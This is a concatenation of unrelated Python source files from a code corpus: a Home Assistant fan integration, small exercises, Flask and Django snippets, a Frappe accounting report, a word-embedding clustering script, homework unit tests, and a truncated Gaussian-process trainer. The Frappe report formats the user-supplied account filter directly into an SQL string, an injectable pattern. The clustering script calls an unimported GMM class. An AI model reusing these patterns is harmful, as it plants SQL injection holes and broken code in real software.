{}\n\n host = config.get(CONF_HOST)\n token = config.get(CONF_TOKEN)\n mapping = config.get(CONF_MAPPING)\n\n _LOGGER.info(\"Initializing %s with host %s (token %s...)\", config.get(CONF_NAME), host, token[:5])\n\n try:\n miio_device = MiotDevice(ip=host, token=token, mapping=mapping)\n device_info = miio_device.info()\n model = device_info.model\n _LOGGER.info(\n \"%s %s %s detected\",\n model,\n device_info.firmware_version,\n device_info.hardware_version,\n )\n\n device = MiotFan(miio_device, config, device_info, hass)\n except DeviceException:\n raise PlatformNotReady\n\n hass.data[DATA_KEY][host] = device\n async_add_devices([device], update_before_add=True)\n \nasync def async_setup_entry(hass, config_entry, async_add_entities):\n config = hass.data[DOMAIN]['configs'].get(config_entry.entry_id, dict(config_entry.data))\n await async_setup_platform(hass, config, async_add_entities)\n\nclass MiotFan(ToggleableMiotDevice, FanEntity):\n def __init__(self, device, config, device_info, hass):\n ToggleableMiotDevice.__init__(self, device, config, device_info, hass)\n self._speed = None\n self._oscillation = None\n \n @property\n def supported_features(self):\n \"\"\"Return the supported features.\"\"\"\n s = 0\n if 'oscillate' in self._mapping:\n s |= SUPPORT_OSCILLATE\n if 'speed' in self._mapping:\n s |= SUPPORT_SET_SPEED\n return s\n\n @property\n def speed_list(self) -> list:\n \"\"\"Get the list of available speeds.\"\"\"\n return list(self._ctrl_params['speed'].keys())\n \n @property\n def speed(self):\n \"\"\"Return the current speed.\"\"\"\n return self._speed\n \n @property\n def oscillating(self):\n \"\"\"Return the oscillation state.\"\"\"\n return self._oscillation\n\n async def async_oscillate(self, oscillating: bool) -> None:\n \"\"\"Set oscillation.\"\"\"\n result = await self.set_property_new(\"oscillate\",self._ctrl_params['oscillate'][oscillating])\n\n if result:\n self._oscillation = oscillating\n self._skip_update = True\n \n async def async_turn_on(self, speed: str = None, **kwargs) -> None:\n \"\"\"Turn on the entity.\"\"\"\n parameters = [{**{'did': \"switch_status\", 'value': self._ctrl_params['switch_status']['power_on']},**(self._mapping['switch_status'])}]\n \n if speed:\n parameters.append({**{'did': \"speed\", 'value': self._ctrl_params['speed'][speed]}, **(self._mapping['speed'])}) \n\n # result = await self._try_command(\n # \"Turning the miio device on failed.\",\n # self._device.send,\n # \"set_properties\",\n # 
parameters,\n # )\n result = await self.set_property_new(multiparams = parameters)\n if result:\n self._state = True\n self._skip_update = True\n \n async def async_update(self):\n await super().async_update()\n # self._speed = self._ctrl_params['speed'].get(self._state_attrs.get('speed_'))\n try:\n self._speed = self.get_key_by_value(self._ctrl_params['speed'],self._state_attrs.get('speed_'))\n except KeyError:\n pass\n self._oscillation = self._state_attrs.get('oscillate')\n","sub_path":"custom_components/xiaomi_miot_raw/fan.py","file_name":"fan.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17382588","text":"from random import randint\nfrom time import sleep\ncomputer = randint(0, 10)\nprint('I thought in a number between 0 and 10. Can you guess?')\nsleep(0.5)\nplayer = int(input('What is your guess? '))\ncount = 0\nwhile computer != player:\n if player < computer:\n print('Try a bigger number...')\n player = int(input('Try again: '))\n elif player > computer:\n print('Try a smaller number...')\n player = int(input('Try again: '))\n count += 1\nprint(f'Congratulations! You won me with {count} guesses.')","sub_path":"Python/guessingGame.py","file_name":"guessingGame.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42907595","text":"from flask_restful import Resource, reqparse\n\nfrom datetime import datetime\n\nfrom summarization.services.summarization_service import SummaryGenerator\nfrom summarization.util.format_key_phrases import format_key_phrases\n\n\nclass SummarizationResource(Resource):\n def __init__(self):\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('full_text', required = True)\n self.parser.add_argument('key_phrases', required=True)\n\n def post(self):\n data = self.parser.parse_args()\n\n try:\n full_text = data['full_text']\n key_phrases = format_key_phrases(data['key_phrases'])\n\n summary = SummaryGenerator(full_text, key_phrases).generate()\n\n return {'summary': summary}\n except:\n return {'message': 'Error in summarizing'}, 400\n","sub_path":"summarization/resources/summarization_resource.py","file_name":"summarization_resource.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483745840","text":"class Solution:\n def maxNumberOfApples(self, arr: List[int]) -> int:\n arr.sort()\n total, count, i = 5000, 0, 0\n while i < len(arr) and total > 0:\n if total - arr[i] >= 0:\n total -= arr[i]\n i += 1\n count += 1\n else:\n break\n return count\n","sub_path":"python/1196_HowManyApplesCanYouPutIntoTheBasket.py","file_name":"1196_HowManyApplesCanYouPutIntoTheBasket.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"586422792","text":"# Copyright (c) 2013, BS and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe import _, _dict\nimport functools\nfrom frappe.utils import getdate, flt\n\nvalue_fields = (\"opening_debit\", \"opening_credit\", \"debit\",\n \"credit\", \"closing_debit\", \"closing_credit\")\n\n\ndef execute(filters=None):\n if filters and filters.from_date > filters.to_date:\n frappe.throw(_(\"From Date cannot be greater than To Date\"))\n\n data = get_data(filters)\n 
columns = get_columns()\n\n return columns, data\n\n\ndef filter_accounts(accounts, depth=10):\n parent_children_map = {}\n accounts_by_name = {}\n filtered_accounts = []\n\n for d in accounts:\n accounts_by_name[d.name] = d\n parent_children_map.setdefault(d.parent_account or None, []).append(d)\n\n def add_to_list(parent, level):\n if level < depth:\n children = parent_children_map.get(parent) or []\n\n for child in children:\n child.indent = level\n filtered_accounts.append(child)\n add_to_list(child.name, level + 1)\n\n add_to_list(None, -1)\n\n return filtered_accounts, accounts_by_name, parent_children_map\n\n\ndef get_opening_balances(filters):\n opening = frappe._dict()\n\n gle = frappe.db.sql(\"\"\"\n select\n account, sum(debit) as opening_debit, sum(credit) as opening_credit\n from `tabGL Entry`\n where\n (DATE(transaction_date) < %(from_date)s)\n group by account\"\"\",\n {\n \"from_date\": filters.from_date,\n },\n as_dict=True)\n\n for d in gle:\n opening.setdefault(d.account, d)\n\n return opening\n\n\ndef set_gl_entries_by_account(from_date, to_date, root_lft, root_rgt, filters):\n gl_entries_by_account = {}\n\n accounts = frappe.db.sql_list(\"\"\"select name from `tabAccounts`\n where lft >= %s and rgt <= %s\"\"\", (root_lft, root_rgt))\n\n gl_filters = {\n \"from_date\": from_date,\n \"to_date\": to_date,\n }\n for key, value in filters.items():\n if value:\n gl_filters.update({\n key: value\n })\n gl_entries = frappe.db.sql(\n \"\"\"\n select \n posting_datetime,transaction_date, account, debit, credit \n from `tabGL Entry`\n where \n account in ({}) \n and DATE(transaction_date) <= %(to_date)s\n order by \n account, DATE(transaction_date)\n \"\"\".format(\", \".join([frappe.db.escape(d) for d in accounts])), gl_filters, as_dict=True)\n\n for entry in gl_entries:\n gl_entries_by_account.setdefault(entry.account, []).append(entry)\n\n return gl_entries_by_account\n\n\ndef calculate_values(accounts, gl_entries_by_account, opening_balances, filters):\n init = {\n \"opening_debit\": 0.0,\n \"opening_credit\": 0.0,\n \"debit\": 0.0,\n \"credit\": 0.0,\n \"closing_debit\": 0.0,\n \"closing_credit\": 0.0\n }\n\n total_row = {\n \"account\": \"'\" + _(\"Total\") + \"'\",\n \"account_name\": \"'\" + _(\"Total\") + \"'\",\n \"warn_if_negative\": True,\n \"opening_debit\": 0.0,\n \"opening_credit\": 0.0,\n \"debit\": 0.0,\n \"credit\": 0.0,\n \"closing_debit\": 0.0,\n \"closing_credit\": 0.0,\n \"parent_account\": None,\n \"indent\": 0,\n \"has_value\": True,\n }\n\n for d in accounts:\n d.update(init.copy())\n\n d[\"opening_debit\"] = opening_balances.get(\n d.name, {}).get(\"opening_debit\", 0)\n d[\"opening_credit\"] = opening_balances.get(\n d.name, {}).get(\"opening_credit\", 0)\n\n for entry in gl_entries_by_account.get(d.name, []):\n d[\"debit\"] += flt(entry.debit)\n d[\"credit\"] += flt(entry.credit)\n\n some_value = flt(d[\"debit\"]) - flt(d[\"credit\"])\n if some_value > 0:\n d[\"closing_debit\"] += abs(some_value)\n else:\n d[\"closing_credit\"] += abs(some_value)\n \n\n total_row[\"debit\"] += d[\"debit\"]\n total_row[\"credit\"] += d[\"credit\"]\n\n return total_row\n\n\ndef accumulate_values_into_parents(accounts, accounts_by_name):\n for d in reversed(accounts):\n if d.parent_account:\n for key in value_fields:\n accounts_by_name[d.parent_account][key] += d[key]\n \n return accounts\n\n\ndef prepare_data(accounts, filters, total_row, parent_children_map):\n data = []\n for d in accounts:\n row = {\n \"account\": d.name,\n \"parent_account\": 
d.parent_account,\n \"indent\": d.indent,\n \"from_date\": filters.from_date,\n \"to_date\": filters.to_date,\n \"account_name\": d.account_name\n }\n\n d[\"closing_debit\"] += d[\"opening_debit\"]\n d[\"closing_credit\"] += d[\"opening_credit\"]\n\n for key in value_fields:\n row[key] = d.get(key, 0.0)\n\n data.append(row)\n \n data += [{}, total_row]\n \n return data[1:]\n\n\ndef get_data(filters):\n if filters.fiscal_year:\n fiscal_year = frappe.get_doc('Fiscal Year', filters.fiscal_year)\n filters.from_date, filters.to_date = str(fiscal_year.start_date), str(fiscal_year.end_date)\n \n accounts = frappe.db.sql(\n \"\"\" select \n name, account_number,parent_accounts as parent_account, account_name, lft, rgt\n from `tabAccounts` \n {}\n order by lft\n \"\"\".format(\"where account_name = '{}'\".format(filters.account) if filters.account else ' ')\n , as_dict=True)\n\n min_lft, max_rgt = frappe.db.sql(r\"select min(lft), max(rgt) from `tabAccounts`\")[0]\n\n accounts, accounts_by_name, parent_children_map = filter_accounts(accounts)\n\n opening_balances = get_opening_balances(filters)\n\n gl_entries_by_account = set_gl_entries_by_account(filters.from_date, filters.to_date,\n min_lft, max_rgt, filters)\n \n total_row = calculate_values(accounts, gl_entries_by_account, opening_balances, filters)\n \n accounts = accumulate_values_into_parents(accounts, accounts_by_name)\n\n data = prepare_data(accounts, filters, total_row, parent_children_map)\n \n return data\n\n\ndef get_columns():\n return [\n {\n \"fieldname\": \"account\",\n \"label\": _(\"Account\"),\n \"fieldtype\": \"Link\",\n \"options\": \"Accounts\",\n \"width\": 300\n },\n {\n \"fieldname\": \"opening_debit\",\n \"label\": _(\"Opening (Dr)\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"opening_credit\",\n \"label\": _(\"Opening (Cr)\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"debit\",\n \"label\": _(\"Debit\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"credit\",\n \"label\": _(\"Credit\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"closing_debit\",\n \"label\": _(\"Closing (Dr)\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"closing_credit\",\n \"label\": _(\"Closing (Cr)\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n }\n ]\n","sub_path":"accounting_app/accounting_app/report/trial_balance/trial_balance.py","file_name":"trial_balance.py","file_ext":"py","file_size_in_byte":7677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546975417","text":"from sklearn.cluster import KMeans\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.mixture import GaussianMixture\nimport numpy as np\nimport pickle\nimport detectNLP\nimport data_helpers\nimport gensim\nfrom GloVe_tensorflow import *\nfrom os.path import exists, join\nimport word_cloud\n\n#can be \"GloVe\", \"pretrainedWord2vec\" or \"category_trainedWord2vec\"\nwordvecType = \"pretrainedWord2vec\"\n\n#can be \"GaussianMixture\", \"KMeans\", \"DBSCAN\" or \"KMeansDBSCAN\"\nclusteringType = \"GaussianMixture\"\n\n#set the number of clusters for KMeans\nn_clusters = 10\n\nX = []\nwords = []\n\ncategory = \"Hotels\"\nwith open(\"data/Las_Vegas-\" + category + \".p\", 
\"rb\") as f:\n reviews, business_id2business, user_id2user = pickle.load(f)\ndel user_id2user\ndel business_id2business\n\nword2count = dict()\ncorpus = []\nfor review in reviews:\n corpus.append(review[\"words\"])\n for word in set(review[\"words\"]):\n if word not in word2count:\n word2count[word] = 0\n word2count[word] += 1\n\ndel reviews\n\nif wordvecType == \"category_trainedWord2vec\":\n model = gensim.models.word2vec.Word2Vec(corpus,size=300, iter=100)\n word2vec = model.wv\nelif wordvecType == \"GloVe\":\n if exists(\"data/GloVe/\" + category + \".bin\"):\n with open(\"data/GloVe/\" + category + \".bin\", 'rb') as vector_f:\n word2vec = pickle.load(vector_f)\n else:\n model = GloVeModel(embedding_size=300, context_size=5)\n model.fit_to_corpus(corpus)\n print(\"Training\")\n model.train(num_epochs=100)\n word2vec = dict()\n\n for text in corpus:\n for word in text:\n if word not in word2vec:\n try:\n word2vec[word] = model.embedding_for(word)\n except Exception:\n continue\n\n with open(\"data/GloVe/\" + category + \".bin\", 'wb+') as vector_f:\n pickle.dump(word2vec, vector_f)\n\nelif wordvecType == \"pretrainedWord2vec\":\n word2vec = dict()\n for word in word2count:\n word2vec[word] = detectNLP.get_average_wordvec(word)\nelse:\n raise Exception(\"Invalid wordvecType\")\n\n\ncnt = 0\nfor word in word2count:\n try:\n wordVec = word2vec[word]\n if not np.isnan(wordVec).any():\n X.append(wordVec)\n words.append(word)\n except Exception:\n continue\n\nif clusteringType==\"KMeans\":\n classifier = KMeans(n_clusters=n_clusters)\n predictions = classifier.fit_predict(X)\nelif clusteringType == \"GaussianMixture\":\n classifier = GMM(n_components=1000, min_covar=0.0001)\n classifier.fit(X)\n predictions = classifier.predict(X)\nelif clusteringType==\"DBSCAN\":\n classifier = DBSCAN(eps = 5, min_samples=100)\n predictions = classifier.fit_predict(X)\nelif clusteringType==\"KMeansDBSCAN\":\n classifier = KMeans(n_clusters=n_clusters)\n predictions = classifier.fit_predict(X)\n subsets = [[]] * 10\n for i,prediction in enumerate(predictions):\n x = X[i]\n subsets[prediction].append(x)\n\n predictions = []\n current_cluster = 0\n for subset in subsets:\n classifier = DBSCAN(eps = 5\n , min_samples=100)\n subpredictions = classifier.fit_predict(X)\n predictions.extend(map(lambda x: x + current_cluster, subpredictions))\n max_cluster = np.max(subpredictions)\n current_cluster += max_cluster\nelse:\n raise Exception(\"Invalid clusteringType\")\n\n\nword2cluster = dict()\n\ncluster_texts = dict()\nrows = [[\"Word\",\"Cluster\"]]\nfor i, word in enumerate(words):\n clusterNum = predictions[i]\n word2cluster[word] = clusterNum\n if clusterNum not in cluster_texts:\n cluster_texts[clusterNum] = []\n cluster_texts[clusterNum].extend([word]*word2count[word])\n\n rows.append([word, clusterNum])\n\nfor cluster in cluster_texts:\n text = \" \".join(cluster_texts[cluster])\n output_filename = \"images/\"+category+\"_\"+wordvecType+\"_\"+clusteringType+\"_cluster\"+str(cluster)+\".png\"\n if category == \"Hotels\":\n mask_filename = \"images/hotel3.jpg\"\n elif category == \"Food\":\n mask_filename = \"images/plate_gray.png\"\n\n word_cloud.make_word_cloud(text,output_filename,mask_filename)\n\nfilename = \"data/\" + wordvecType + \"-\" + clusteringType + \"-\" + category+\"_word2cluster.csv\"\ndata_helpers.write_csv(filename, 
rows)\ndata_helpers.write_csv_to_xlsx(filename)\n","sub_path":"word2vecClustering.py","file_name":"word2vecClustering.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479507562","text":"from django.urls import path\n\nfrom .views import CreateUserView, login_user, logut_user\n\n\nurlpatterns =[\n path('register', CreateUserView.as_view(), name='register'),\n path('login', login_user, name='login'),\n path('logout', logut_user, name='logout'),\n]","sub_path":"CustomUser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491828425","text":"from hw2 import *\nimport hw2\nimport math\nimport unittest, sys, io, os, random, pickle\nfrom unittest.mock import patch\nfrom contextlib import redirect_stdout, redirect_stderr\nfrom compare_pandas import compare_lists, compare_los\n\n\"\"\"\nRewrite these tests so that use only a portion of the corpus for\nthe sake of speed.\n\"\"\"\n\n\"\"\"\nThese tests depend on your code passing the previous tests, \nso get them working in the order that they are tested.\n\nMaking the classifier takes a long time, so in a lot of these\ntests, I am doing odd things to bypass having to create a classifier\nto access the methods.\n\nFiles needed:\nhw2.py\nget_data.py - necessary to download the data\nlabeled_data_test.pkl, labeled_data_train.pkl, word_counts_ld_train.pkl\nword_probs_ld_train1.pkl, word_probs_ld_train1.pkl\nmain_out_correct.txt is NOT NEEDED\n\"\"\"\n\nclass TestHw2(unittest.TestCase):\n \n def test_parse_line(self):\n line = 'List-Post: '\n self.assertEqual('', LabeledData.parse_line(line))\n line = ' Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n self.assertEqual('', LabeledData.parse_line(line))\n line = ' : Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n parsed = ': Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n self.assertEqual(parsed, LabeledData.parse_line(line))\n line = 'xxx : Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n self.assertEqual('', LabeledData.parse_line(line))\n line = '18:19:04 Marking 1 hits' # oops! Not a header line. Oh well.\n self.assertEqual('', LabeledData.parse_line(line))\n line = ' hey Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com> '\n parsed = 'hey Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n self.assertEqual(parsed, LabeledData.parse_line(line))\n\n def test_parse_message(self):\n fp = io.StringIO(\"from: nowhere\\nto: nobody\\n\\nWhat the...\\nI'm confused\")\n correct = \"What the... I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n\n fp = io.StringIO(\"from nowhere\\nto: nobody\\n\\nWhat the...\\nI'm confused\")\n correct = \"What the... I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n\n fp = io.StringIO(\"from nowhere\\nSubject:Hey Sucka\\nto: nobody\\n\\nWhat the...\\nI'm confused\")\n correct = \"Hey Sucka What the... 
I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n\n fp = io.StringIO(\"from nowhere\\nSubject:Hey Sucka\\nto: nobody\\n\\n\" + \n \" Subject: re: What the...\\nI'm confused\")\n correct = \"Hey Sucka I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n \n fp = io.StringIO(\"from nowhere\\nSubject: re: re: Hey Sucka\\nto: nobody\\n\\n\" + \n \" Subject: re: What the...\\nI'm confused\")\n correct = \"Hey Sucka I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n \n fp = io.StringIO(\"from nowhere\\nSubject: Re: Re: Hey Sucka\\nto: nobody\\n\\n\" + \n \" Subject: re: What the...\\nI'm confused\")\n correct = \"Hey Sucka I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n \n def test_init_LabeledData(self):\n with patch('os.listdir', side_effect=[['hf1', 'hf2', 'hf3'], ['spf1', 'spf2']]):\n with patch('hw2.LabeledData.parse_message', side_effect=['ham1', 'ham2', 'ham3', 'spam1', 'spam2']):\n ld = LabeledData('hp', 'sp')\n self.assertEqual(['ham1', 'ham2', 'ham3', 'spam1', 'spam2'], ld.X)\n self.assertEqual([0, 0, 0, 1, 1], ld.y)\n with open('labeled_data_train.pkl', 'rb') as fp:\n correct = pickle.load(fp)\n student = LabeledData()\n self.assertTrue(compare_los(correct.X, student.X, skip_str_lens=True))\n self.assertTrue(compare_lists(correct.y, student.y))\n with open('labeled_data_test.pkl', 'rb') as fp:\n correct = pickle.load(fp)\n student = LabeledData('data/2003/easy_ham', 'data/2003/spam')\n self.assertTrue(compare_los(correct.X, student.X, skip_str_lens=True))\n self.assertTrue(compare_lists(correct.y, student.y))\n \n def test_tokenize(self):\n class HasStemmer:\n def __init__(self):\n self.stemmer = SnowballStemmer(\"english\")\n nada = HasStemmer()\n\n correct = {'tell', 'ca', 'want', 's'}\n text = \"I can't tell you 123, how567^%$ much I don't want to do this s#@!\"\n self.assertEqual(correct, NaiveBayesClassifier.tokenize(nada, text))\n\n text = \"WHAT IS GOING ON????\"\n self.assertEqual(set(), NaiveBayesClassifier.tokenize(nada, text))\n\n correct = {'stopword', 'word'}\n text = \"MUST FIND A WORD THAT ISN'T A STOPWORD. 
WHAT IS IT?\"\n self.assertEqual(correct, NaiveBayesClassifier.tokenize(nada, text))\n\n correct = {'swimmer', 'fast', 'fastest', 'swim', 'faster'} # this stemmer sucks\n text = \"swim swimmer swimmer's swimming fast faster fastest\"\n self.assertEqual(correct, NaiveBayesClassifier.tokenize(nada, text))\n\n def test_count_words(self):\n class HasLD:\n def __init__(self, ld):\n self.labeled_data = ld\n self.stemmer = SnowballStemmer(\"english\")\n\n HasLD.tokenize = NaiveBayesClassifier.tokenize\n\n X = ['ha hsa, hb', 'sa, hsa$ sb', 'ha, hsa, hc']\n y = [0, 1, 0]\n ld = LabeledData(X=X, y=y)\n nada = HasLD(ld)\n\n correct = {'ha': [0, 2], 'hsa': [1, 2], 'hb': [0, 1], 'sa': [1, 0], \n 'sb': [1, 0], 'hc': [0, 1]}\n self.assertEqual(correct, NaiveBayesClassifier.count_words(nada))\n\n with open('word_counts_ld_train.pkl', 'rb') as fp:\n with open('labeled_data_train.pkl', 'rb') as fp2:\n correct = pickle.load(fp)\n ld = pickle.load(fp2)\n nada = HasLD(ld)\n self.assertEqual(correct, NaiveBayesClassifier.count_words(nada))\n\n def test_init_NaiveBayesClassifier(self):\n with open('labeled_data_train.pkl', 'rb') as fp:\n ld = pickle.load(fp)\n\n classifier = NaiveBayesClassifier(ld, max_words=25)\n with open('word_probs_ld_train1.pkl', 'rb') as fp:\n word_probs = pickle.load(fp)\n self.assertTrue(classifier.stemmer)\n self.assertEqual(ld, classifier.labeled_data)\n self.assertEqual(25, classifier.max_words)\n self.assertEqual(word_probs, classifier.word_probs)\n\n classifier = NaiveBayesClassifier(ld, 1)\n with open('word_probs_ld_train2.pkl', 'rb') as fp:\n word_probs = pickle.load(fp)\n self.assertEqual(50, classifier.max_words)\n self.assertEqual(word_probs, classifier.word_probs)\n\n def test_get_tokens(self):\n class HasMaxWords:\n def __init__(self, max_words=10):\n self.max_words = max_words\n\n random.seed(25)\n message = {'please', 'this', 'test', 'must', 'end'}\n correct = ['test', 'end', 'this']\n nada = HasMaxWords(3)\n self.assertEqual(correct, NaiveBayesClassifier.get_tokens(nada, message))\n\n correct = ['please', 'test', 'end', 'must', 'this']\n nada = HasMaxWords(7)\n self.assertEqual(correct, NaiveBayesClassifier.get_tokens(nada, message))\n\n correct = ['please', 'test']\n nada = HasMaxWords(2)\n self.assertEqual(correct, NaiveBayesClassifier.get_tokens(nada, message))\n\n def test_spam_probability(self):\n with open('labeled_data_train.pkl', 'rb') as fp:\n ld = pickle.load(fp)\n\n classifier = NaiveBayesClassifier(ld, max_words=25)\n message = (\"This message is completely legit. 
It is full of ham and good \" +\n \"thoughts and ideas and excellent suggestions.\")\n self.assertTrue(math.isclose(0.014279741503990657, classifier.spam_probability(message)))\n \n def test_classify(self):\n class HasSP:\n def __init__(self):\n self.gen = (i for i in [-1, 0, 0.49, 0.5, 0.51, 1, 2])\n\n def spam_probability(self, message):\n return next(self.gen)\n\n nada = HasSP()\n self.assertFalse(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertFalse(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertFalse(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertTrue(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertTrue(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertTrue(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertTrue(NaiveBayesClassifier.classify(nada, 'message'))\n\n def test_predict(self):\n class HasClassify:\n def __init__(self):\n self.gen = (b for b in [True, False, False, True])\n\n def classify(self, message):\n return next(self.gen)\n\n nada = HasClassify()\n X = ['m1', 'm2', 'm3', 'm4']\n correct = [True, False, False, True]\n self.assertEqual(correct, NaiveBayesClassifier.predict(nada, X))\n\n def test_main(self):\n correct = \"[[2016 485]\\n [ 0 501]]\\naccuracy: 83.84%\\n\"\n #correct = \"[[2008 493]\\n [ 0 501]]\\naccuracy: 83.58%\\n\"\n with io.StringIO() as buf, redirect_stdout(buf):\n random.seed(25)\n hw2.main()\n self.assertEqual(correct, buf.getvalue())\n\n\n \"\"\" \n def test_count_words(self):\n '''\n This is the most f***ed up test ever. There must be an easier way.\n A much, much easier way. Ok, found it, but keeping this because it's such a \n ridiculous work around.\n '''\n class HasStemmer:\n def __init__(self):\n self.stemmer = SnowballStemmer(\"english\")\n \n class HasLD:\n def __init__(self, ld):\n self.labeled_data = ld\n \n def tokenize(self, message):\n nada = HasStemmer()\n return hw2.NaiveBayesClassifier.tokenize(nada, message)\n\n X = ['ha hsa, hb', 'sa, hsa$ sb', 'ha, hsa, hc']\n y = [0, 1, 0]\n ld = LabeledData(X=X, y=y)\n nada = HasLD(ld)\n\n correct = {'ha': [0, 2], 'hsa': [1, 2], 'hb': [0, 1], 'sa': [1, 0], \n 'sb': [1, 0], 'hc': [0, 1]}\n self.assertEqual(correct, dict(hw2.NaiveBayesClassifier.count_words(nada)))\n \"\"\" \n\nif __name__ == \"__main__\":\n test = unittest.defaultTestLoader.loadTestsFromTestCase(TestHw2)\n results = unittest.TextTestRunner().run(test)\n tests_run = results.testsRun\n failures = len(results.failures)\n errors = len(results.errors)\n sys.stdout = sys.__stdout__\n print('Correctness score = ', str((tests_run - errors - failures) / tests_run * 100) + '%')\n","sub_path":"hw2/hw2_test.py","file_name":"hw2_test.py","file_ext":"py","file_size_in_byte":11474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113264932","text":"import time\n\nimport gpytorch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport torch\nfrom gpytorch import mlls\n\nfrom ts.benchmark.model import SpectralMixtureGPModel\nfrom ts.utils.loss_modules import sMAPE\n\n\nclass Trainer:\n def __init__(self, model_name, dataloader, run_id, add_run_id, config, csv_path, figure_path):\n super(Trainer, self).__init__()\n self.model_name = model_name\n self.config = config\n self.data_loader = dataloader\n self.run_id = str(run_id)\n self.add_run_id = add_run_id\n self.csv_save_path = csv_path\n self.figure_path = figure_path\n\n def train(self):\n self.figure_path.mkdir(parents=True, exist_ok=True)\n 
start_time = time.time()\n ts_label = self.config[\"sample_ids\"][0]\n (train, val, test, info_cat, ts_labels, idx) = next(iter(self.data_loader))\n\n data_y = np.squeeze(torch.cat((train, val), dim=1))\n N_samples = min(self.config[\"min_samples\"], data_y.shape[0])\n sample_indices = np.random.choice(data_y.shape[0], N_samples, replace=False)\n data_x = np.arange(data_y.shape[0], dtype=float)\n train_x = torch.from_numpy(data_x[sample_indices]).float()\n train_y = data_y[sample_indices]\n\n likelihood = gpytorch.likelihoods.GaussianLikelihood()\n model = SpectralMixtureGPModel(train_x, train_y, likelihood)\n model.train()\n likelihood.train()\n mll = mlls.ExactMarginalLogLikelihood(model.likelihood, model)\n optimizer = torch.optim.Adam(model.parameters(), lr=self.config[\"learning_rate\"])\n\n training_iter = 100\n for i in range(training_iter):\n optimizer.zero_grad()\n forecast = model(train_x)\n loss = - mll(forecast, train_y)\n loss.backward()\n optimizer.step()\n print('Iter %d/%d - Loss: %.3f noise: %.3f' % (\n i + 1, training_iter, loss.item(),\n model.likelihood.noise.item()\n ))\n\n test_data_y = np.squeeze(torch.cat((train, val, test), axis=1))\n test_data_x = np.arange(test_data_y.shape[0], dtype=float)\n test_x = torch.from_numpy(test_data_x).float()\n\n # Get into evaluation (predictive posterior) mode\n model.eval()\n likelihood.eval()\n\n # The gpytorch.settings.fast_pred_var flag activates LOVE (for fast variances)\n with torch.no_grad(), gpytorch.settings.fast_pred_var():\n # Make predictions\n\n\n observed_pred = likelihood(model(test_x))\n\n # Initialize plot\n f, ax = plt.subplots(figsize=(17, 4))\n\n # Get upper and lower confidence bounds\n lower, upper = observed_pred.confidence_region()\n # Plot training data\n ax.plot(test_data_x, test_data_y, \"b\")\n #ax.plot(data_x, data_y, \"k\")\n ax.plot(train_x.numpy(), train_y.numpy(), \"k*\")\n # Plot predictive means as blue line\n ax.plot(test_x.numpy(), observed_pred.mean.numpy(), \"r\")\n # Shade between the lower and upper confidence bounds\n ax.fill_between(test_x.numpy(), lower.numpy(), upper.numpy(), alpha=0.5)\n ax.legend([\"Truth\", \"Samples\", \"Mean\", \"Confidence\"])\n ax.set_xlabel(\"Time\")\n ax.set_ylabel(\"Observations\")\n mape = sMAPE(observed_pred.mean[-self.config[\"output_size\"]:],\n test_data_y[-self.config[\"output_size\"]:], self.config[\"output_size\"])\n ax.set_title(\"Time Series:{}, MAPE:{:8.2f}, N samples:{}\".format(ts_label, mape, N_samples))\n #plt.show()\n plt.tight_layout()\n 